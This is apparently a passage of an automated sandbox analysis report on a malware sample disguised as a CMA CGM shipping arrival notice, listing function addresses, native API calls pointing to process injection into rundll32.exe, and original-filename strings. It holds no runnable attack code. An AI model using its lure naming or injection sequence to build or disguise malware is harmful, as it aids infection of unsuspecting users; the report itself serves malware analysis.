      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BDFC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791DCB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789DCC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790DB1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788DAD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00792E7A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E69
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BE34
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788E29
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790E21
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E00
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790EF8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00784EBB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BEBC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781EA8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785EAC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788EA0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790E85
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F7D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781F6C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BF61
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789F54
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BF4B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785F4D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781F10
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F11
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BF01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781FFC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FF4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785FE4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786FA9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FAA
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E626E30
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63EBB0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1002
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61841F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61B090
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D1D55
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E600D20
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E624120
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60F900
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487B090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921002
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487841F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04860D20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04931D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04886E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489EBB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00802D88
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00802D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00809E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CF93
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CF96
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00802FB0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: String function: 1E60B150 appears 32 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0486B150 appears 32 times
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078F4F6 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B52A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00793504 LoadLibraryA,NtSetContextThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875D7 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A83B NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00792D4E NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078907D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A058 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A03A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A0D4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007890CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789144 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A135 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A1B4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A27C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A250 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789214 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892D0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892B8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892B4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789295 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A364 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789339 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007893A8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789431 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007894B9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B491 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789560 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789537 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B5BC NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789668 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B628 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007896E9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B6A0 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B71C NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B789 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789783 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078185B NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789829 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007898A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078991F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078990D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889FB NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007899BC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889AC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788A7C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789A21 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788AE1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789AC7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789A94 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789B7C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788B54 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789B14 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789BF8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789C60 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788C45 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788CB8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789CA0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BD69 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789D49 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788D40 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078DD10 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789DCC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788DAD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E69 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788E29 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E00 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785EAC NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788EA0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F7D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789F54 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F11 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FF4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FAA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6497A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6498F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A10 NtQuerySection,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6496D0 NtCreateKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649760 NtOpenProcess,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64A770 NtOpenThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6498A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649560 NtWriteFile,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6495F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6499D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6495D0 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819D50 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819E80 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819E00 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819F30 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819DFA NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819D4A NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819F2A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess Stats: CPU usage > 98%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929592552.0000000002A30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesmedesvende.exeFE2XKareo vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000000.661545013.0000000000448000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258380873.00000000000D9000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
